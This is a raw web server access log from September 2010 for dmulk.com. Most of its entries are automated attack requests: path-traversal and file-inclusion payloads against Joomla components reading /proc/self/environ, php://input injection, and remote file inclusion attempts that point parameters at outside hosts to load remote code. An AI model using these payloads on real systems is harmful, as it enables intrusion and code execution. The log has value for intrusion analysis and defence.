75.127.98.12 - - [02/Sep/2010:09:10:31 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:10:31 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:10:31 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:11:12 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:11:15 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:11:17 -0700] "GET /admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:11:20 -0700] "GET /admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:11:20 -0700] "GET /logs/access_100506.log%20%20//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:11:22 -0700] "GET /logs/access_090527.log%20%20//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:11:24 -0700] "GET /logs/access_090527.log%20%20//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:11:45 -0700] "GET /logs/access_100823.log/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:11:47 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68478 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:11:48 -0700] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:11:50 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:11:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:11:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:11:53 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:11:53 -0700] "POST /logs/access_090322.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:11:53 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:11:55 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:11:55 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:11:55 -0700] "POST /logs/access_090322.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:12:25 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
202.29.86.7 - - [02/Sep/2010:09:12:36 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:12:43 -0700] "GET /index2.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:09:14:00 -0700] "POST /logs/access_100410.log/gsitemap.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:09:14:00 -0700] "POST /logs/gsitemap.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:09:14:00 -0700] "POST /gsitemap.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:14:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:14:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:14:06 -0700] "POST /logs/access_100410.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:09:14:20 -0700] "GET /logs/access_081203.log HTTP/1.0" 200 2646084 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:14:48 -0700] "POST /logs/access_090320.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:14:56 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:14:56 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:14:56 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:14:56 -0700] "POST /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:14:57 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:14:58 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68508 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:14:59 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68511 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:00 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:10 -0700] "POST /index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 200 68409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:12 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68446 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:12 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:12 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:12 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:12 -0700] "POST /logs/index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:15:13 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:16:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:16:43 -0700] "GET /logs/access_090508.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:16:43 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:16:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:16:46 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:16:46 -0700] "GET /logs/access_090508.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:16:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:16:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:16:59 -0700] "POST /logs/access_100611.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:17:10 -0700] "GET /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:17:10 -0700] "GET /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:17:11 -0700] "GET /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:17:11 -0700] "POST /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:17:11 -0700] "GET /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:18:02 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68478 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:18:03 -0700] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:09:19:20 -0700] "POST /gsitemap.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:09:19:20 -0700] "POST /logs/access_100410.log%20%20/gsitemap.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:09:19:20 -0700] "POST /logs/gsitemap.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
91.201.66.60 - - [02/Sep/2010:09:20:07 -0700] "GET /logs/access_081122.log HTTP/1.1" 200 4258638 "http://www.dmulk.com/logs/access_081122.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.225.141.62 - - [02/Sep/2010:09:20:08 -0700] "POST /logs//xmlrpc.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
67.225.141.62 - - [02/Sep/2010:09:20:08 -0700] "POST /xmlrpc.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
67.225.141.62 - - [02/Sep/2010:09:20:08 -0700] "POST /logs/access_090912.log//xmlrpc.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:09:20:13 -0700] "GET /logs/access_071206.log HTTP/1.0" 200 76911 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:20:42 -0700] "GET /logs/access_081105.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:20:44 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:20:47 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68551 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:20:59 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:20:59 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:21:05 -0700] "GET /logs/access_081105.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
202.29.86.7 - - [02/Sep/2010:09:21:49 -0700] "GET /index2.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:09:22:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:09:22:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:09:22:16 -0700] "POST /logs/access_080219.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:22:54 -0700] "POST /logs/access_090322.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:22:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:22:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:23:26 -0700] "POST /logs/access_090322.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:23:27 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:23:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:09:23:31 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:09:23:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:09:23:31 -0700] "POST /logs/access_080219.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:23:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.0" 200 68515 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:23:50 -0700] "GET /logs/access_080508.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:23:50 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:24:02 -0700] "GET /logs/access_090607.log//index2.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:24:03 -0700] "GET /index2.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:24:03 -0700] "GET /logs//index2.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:24:40 -0700] "GET /logs/access_090527.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:24:40 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:24:45 -0700] "GET /admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:24:45 -0700] "GET /logs/access_091213.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
120.50.34.74 - - [02/Sep/2010:09:24:53 -0700] "POST /logs/access_090320.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:25:05 -0700] "GET /admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:25:05 -0700] "GET /logs/access_091213.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:25:05 -0700] "GET /logs/access_090527.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:25:05 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:09:25:05 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:09:25:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:09:25:14 -0700] "POST /logs/access_081230.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:09:25:35 -0700] "GET /funny/?S=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.29.86.7 - - [02/Sep/2010:09:26:13 -0700] "GET /logs/access_100601.log//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
202.29.86.7 - - [02/Sep/2010:09:26:13 -0700] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
202.29.86.7 - - [02/Sep/2010:09:26:14 -0700] "GET /logs//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.114.58 - - [02/Sep/2010:09:27:58 -0700] "GET /logs/access_071223.log HTTP/1.0" 200 97760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:30:41 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
64.157.4.43 - - [02/Sep/2010:09:31:05 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
